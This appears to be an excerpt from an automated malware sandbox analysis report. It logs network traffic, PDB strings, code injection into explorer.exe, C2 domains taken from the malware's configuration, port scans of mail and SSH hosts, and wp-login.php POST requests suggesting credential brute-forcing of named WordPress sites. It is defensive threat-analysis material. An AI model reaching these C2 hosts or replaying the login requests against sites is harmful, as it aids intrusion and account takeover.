Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:52368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:51986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:52129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:52133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:52201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:53008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:53580 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:53356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:53354 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:53394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:53530 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:53827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:53834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:53853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:53851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:53850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:54193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:54187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:54192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:54191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:54188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:54194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:54448 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:54126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:54121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:55021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:55016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:55223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:55225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:55579 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:55440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:55713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:55704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.46:443 -> 192.168.2.4:55645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:55739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:55700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:55738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:55735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:56249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56455 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:56518 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:56519 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56562 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:56550 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56559 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56657 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56658 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:56580 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:56588 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:56347 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:56133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:56719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:56715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:57453 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:57547 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:57701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:57606 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:57598 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:57689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:57605 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:57702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.194.166.146:443 -> 192.168.2.4:57699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:57697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:58343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:58344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:58374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:58425 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:58447 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:58649 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:58575 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:59131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:59144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:59123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:59135 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:59509 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:59538 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:59694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:59576 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:60182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:59583 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:60471 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:60866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:60805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:61064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:61641 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: DFD5.exe, 0000000D.00000002.2094970105.000000006CA34000.00000002.00000001.01000000.0000000E.sdmp, DFD5.exe, 0000000D.00000002.2087944022.0000000004319000.00000004.00000800.00020000.00000000.sdmp, DFD5.exe, 0000000D.00000002.2087944022.00000000041E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: installed_settings_to_improve_the_installation.pdblation.pdbpdbion.pdblation.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: KK.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: oC:\Users\user\AppData\Local\Temp\installed_settings_to_improve_the_installation.pdb\ source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdbm source: DFD5.exe, 0000000D.00000002.2086366005.00000000013C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\installed_settings_to_improve_the_installation.pdbpdbion.pdb9 source: DFD5.exe, 0000000D.00000002.2086366005.00000000013C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: installed_settings_to_improve_the_installation.pdb\Users\user\AppData\Local\Temp\DFD5.PDB source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb\ source: DFD5.exe, 0000000D.00000002.2092031983.0000000005800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\DFD5.PDB source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000138E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: o.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\installed_settings_to_improve_the_installation.pdb9h source: DFD5.exe, 0000000D.00000002.2086366005.000000000138E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\installed_settings_to_improve_the_installation.pdbz} source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Windows.Forms.pdb$ source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n\|C:\Windows\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2092031983.0000000005800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: DFD5.exe, 0000000D.00000002.2086366005.00000000013C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: DFD5.exe, 0000000D.00000002.2092031983.0000000005800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: DFD5.exe, 0000000D.00000002.2087944022.000000000442E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: installed_settings_to_improve_the_installation.pdb3 source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D217.exe_bc845d3a7a388bf7bd3d9ba7ed8831bf754e15_85635c02_c67bd312-d49c-415a-84c9-9c6b02ebf720\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DFD5.exe_395aa9c4c8dd1dc99b3d53c1dce5dca5a40509e_b10f0b35_8cbadb55-0125-471e-a71e-1fcc76aec1cd\

Networking

Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.94.245.237:80 -> 192.168.2.4:49734
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 104.198.2.251:80 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.143.166.163:80 -> 192.168.2.4:49736

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.67.215.49 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.46.59 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.143.166.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.198.2.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: ssh.studnets.ocps.net
Source: C:\Windows\explorer.exe	Network Connect: 34.94.245.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.180.10.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: pop3.saskgmail.com
Source: C:\Windows\explorer.exe	Network Connect: 172.67.185.93 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 196.188.169.138 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.215.85.17 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: imap.9a07f8a339ec2a3e.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kumbuyartyty.net/
Source: Malware configuration extractor	URLs: http://criogetikfenbut.org/
Source: Malware configuration extractor	URLs: http://stualialuyastrelia.net/
Source: Malware configuration extractor	URLs: http://onualituyrs.org/
Source: Malware configuration extractor	URLs: http://sumagulituyo.org/
Source: Malware configuration extractor	URLs: http://snukerukeutit.org/
Source: Malware configuration extractor	URLs: http://lightseinsteniki.org/
Source: Malware configuration extractor	URLs: http://tyiuiunuewqy.org/
Source: Malware configuration extractor	URLs: http://liuliuoumumy.org/
Source: Malware configuration extractor	URLs: http://tonimiuyaytre.org/

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 202.130.44.227 ports 25,143,465,993,4,587,5,6
Source: global traffic	TCP traffic: 85.234.244.76 ports 143,465,993,4,587,5,6
Source: global traffic	TCP traffic: 68.178.213.244 ports 143,220,110,2525,465,993,587,5,995,9
Source: global traffic	TCP traffic: 136.147.129.27 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 3.126.94.219 ports 22,143,990,222,3,443,465,993,4,587,80,21
Source: global traffic	TCP traffic: 104.47.71.138 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 35.168.67.138 ports 22,990,222,3,443,465,4,995,2222,80,21
Source: global traffic	TCP traffic: 104.24.83.4 ports 22,990,1,2,222,21
Source: global traffic	TCP traffic: 85.234.244.77 ports 143,1,3,465,993,4,587
Source: global traffic	TCP traffic: 209.182.195.165 ports 22,143,110,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 218.213.216.3 ports 22,143,990,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 209.222.82.255 ports 26,143,110,2,3535,993,995,6
Source: global traffic	TCP traffic: 31.214.176.67 ports 25,143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 209.222.82.253 ports 26,143,110,993,3535,5,995,9
Source: global traffic	TCP traffic: 209.222.82.252 ports 26,143,110,1,3,993,3535,4,995
Source: global traffic	TCP traffic: 13.126.65.12 ports 22,990,143,1,2,222,443,80,21
Source: global traffic	TCP traffic: 34.205.242.146 ports 22,143,990,110,220,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 167.235.0.29 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 13.248.169.48 ports 22,26,110,990,2,222,443,3535,995,2222,80,21
Source: global traffic	TCP traffic: 216.69.141.82 ports 25,26,220,143,110,1,2525,3,465,993,4,587,995
Source: global traffic	TCP traffic: 104.47.18.74 ports 143,465,4,5,995,6
Source: global traffic	TCP traffic: 183.111.174.109 ports 22,990,2,443,80,21
Source: global traffic	TCP traffic: 209.124.80.122 ports 22,2,222,443,2222,80,21
Source: global traffic	TCP traffic: 217.146.69.50 ports 22,1,2,222,443,80,21
Source: global traffic	TCP traffic: 200.58.112.162 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 34.206.39.153 ports 22,143,990,110,1,2,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 66.254.66.55 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 205.178.189.129 ports 22,143,990,110,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 104.47.75.164 ports 110,587,5,995,7,8
Source: global traffic	TCP traffic: 104.47.55.138 ports 143,220,465,993,5,995,9
Source: global traffic	TCP traffic: 115.111.182.213 ports 0,220,110,2,465,587,995
Source: global traffic	TCP traffic: 104.47.59.138 ports 143,220,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 15.197.142.173 ports 22,143,990,110,2,222,443,465,993,995,80,21
Source: global traffic	TCP traffic: 104.47.74.202 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 208.91.197.26 ports 22,143,110,990,1,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 64.68.191.221 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 104.24.82.4 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 185.230.63.171 ports 22,990,2,222,443,2222,80,21
Source: global traffic	TCP traffic: 136.147.189.244 ports 25,26,143,110,2525,993,5,995,9
Source: global traffic	TCP traffic: 104.26.0.173 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 104.47.66.10 ports 143,110,1,3,993,4,587
Source: global traffic	TCP traffic: 76.223.54.146 ports 22,26,110,990,1,2,222,3535,995,21
Source: global traffic	TCP traffic: 3.94.41.167 ports 22,143,990,110,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 142.250.27.26 ports 143,1,3,465,993,4,587
Source: global traffic	TCP traffic: 206.188.192.247 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 104.47.75.228 ports 25,110,2525,587,5,995,9
Source: global traffic	TCP traffic: 96.249.39.20 ports 22,26,990,110,222,3,443,3535,4,995,80,21
Source: global traffic	TCP traffic: 3.33.130.190 ports 22,143,990,110,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 3.230.199.117 ports 22,990,1,2,222,465,21
Source: global traffic	TCP traffic: 185.230.63.107 ports 22,25,143,990,110,220,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 62.149.128.151 ports 22,143,1,3,465,993,4,587,21
Source: global traffic	TCP traffic: 104.143.9.211 ports 990,1,2,443,80,21
Source: global traffic	TCP traffic: 103.42.111.169 ports 22,1,2,222,443,80,21
Source: global traffic	TCP traffic: 216.194.166.146 ports 22,143,110,222,3,443,465,993,4,587,995,80,21
Source: global traffic	TCP traffic: 207.211.30.141 ports 143,110,1,3,465,993,4,995
Source: global traffic	TCP traffic: 50.31.65.5 ports 22,0,143,110,222,465,443,993,587,995,2222,8,80,21
Source: global traffic	TCP traffic: 34.136.28.237 ports 22,990,143,2,222,443,80,21
Source: global traffic	TCP traffic: 38.177.197.58 ports 22,143,990,110,1,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 52.101.9.0 ports 143,465,4,5,995,6
Source: global traffic	TCP traffic: 165.22.195.184 ports 25,143,110,220,465,993,587,5,995,9
Source: global traffic	TCP traffic: 51.81.206.108 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 91.132.253.137 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 217.70.178.216 ports 220,993,465,4,587,5,6
Source: global traffic	TCP traffic: 218.214.227.80 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 199.59.243.225 ports 22,25,143,990,2525,222,3,443,993,4,80,21
Source: global traffic	TCP traffic: 156.38.230.76 ports 22,143,990,3,443,465,993,4,587,80,21
Source: global traffic	TCP traffic: 107.158.136.76 ports 22,143,990,110,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 121.53.85.23 ports 143,1,3,465,993,4,587
Source: global traffic	TCP traffic: 3.33.152.147 ports 22,143,990,110,2,222,465,993,995,21
Source: global traffic	TCP traffic: 8.31.233.168 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 213.186.33.19 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 69.42.204.12 ports 22,2,222,443,80,21
Source: global traffic	TCP traffic: 173.201.182.85 ports 22,3,443,4,80,21
Source: global traffic	TCP traffic: 67.195.228.75 ports 110,220,3535,993,5,995,9
Source: global traffic	TCP traffic: 67.195.204.83 ports 110,220,3535,993,5,995,9
Source: global traffic	TCP traffic: 35.197.165.27 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 52.86.6.113 ports 22,143,110,990,2,222,465,993,587,995,21
Source: global traffic	TCP traffic: 205.178.132.70 ports 22,143,990,222,3,443,465,4,80,21
Source: global traffic	TCP traffic: 54.161.222.85 ports 22,143,990,110,220,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 205.139.110.221 ports 25,143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 67.222.150.127 ports 22,990,143,2,222,443,995,80,21
Source: global traffic	TCP traffic: 104.17.71.73 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 167.172.236.129 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 104.47.17.138 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 200.58.122.206 ports 25,143,465,993,4,587,5,6
Source: global traffic	TCP traffic: 15.197.148.33 ports 22,143,990,110,2,222,465,993,587,995,21
Source: global traffic	TCP traffic: 116.90.51.60 ports 22,2,222,443,80,21
Source: global traffic	TCP traffic: 52.101.41.0 ports 143,465,4,5,995,6
Source: global traffic	TCP traffic: 104.26.1.173 ports 22,990,1,2,222,21
Source: global traffic	TCP traffic: 38.181.56.100 ports 22,25,143,990,110,220,2,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 104.47.71.202 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 104.21.69.169 ports 22,25,143,110,990,220,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 64.233.186.27 ports 143,220,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 44.194.75.85 ports 22,25,990,220,110,2,222,443,993,465,587,995,80,21
Source: global traffic	TCP traffic: 62.149.128.166 ports 22,143,990,1,2,222,465,993,21
Source: global traffic	TCP traffic: 67.231.154.162 ports 110,143,1,3,993,4
Source: global traffic	TCP traffic: 62.149.128.163 ports 22,110,143,990,222,3,443,465,993,4,587,995,80,21
Source: global traffic	TCP traffic: 141.193.213.10 ports 22,990,1,2,222,443,2222,80,21
Source: global traffic	TCP traffic: 141.193.213.11 ports 22,990,1,2,222,21
Source: global traffic	TCP traffic: 104.21.52.80 ports 22,990,222,3,443,4,2222,80,21
Source: global traffic	TCP traffic: 89.46.108.50 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 185.162.89.66 ports 22,143,2,222,443,465,993,587,2222,80,21
Source: global traffic	TCP traffic: 177.153.23.241 ports 25,0,110,1,2525,587
Source: global traffic	TCP traffic: 52.165.155.237 ports 22,26,990,2,222,443,3535,80,21
Source: global traffic	TCP traffic: 8.31.233.184 ports 143,110,1,3,465,993,4,587,995

Found C&C like URL pattern

Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=t3bhc4ud222ni4dqk308a6qgnlUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1Content-Length: 134Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=8aonfjgkl3468gr5hac56tn05nUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1Content-Length: 154Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://oceanictrailers.com.au/wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1Content-Length: 134Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://saltdelcolom.com/wp-login.phpContent-Length: 144Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=eg5hoe9fiphpkgc7auqitf2hvpUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1Content-Length: 132Content-Type: application/x-www-form-urlencoded
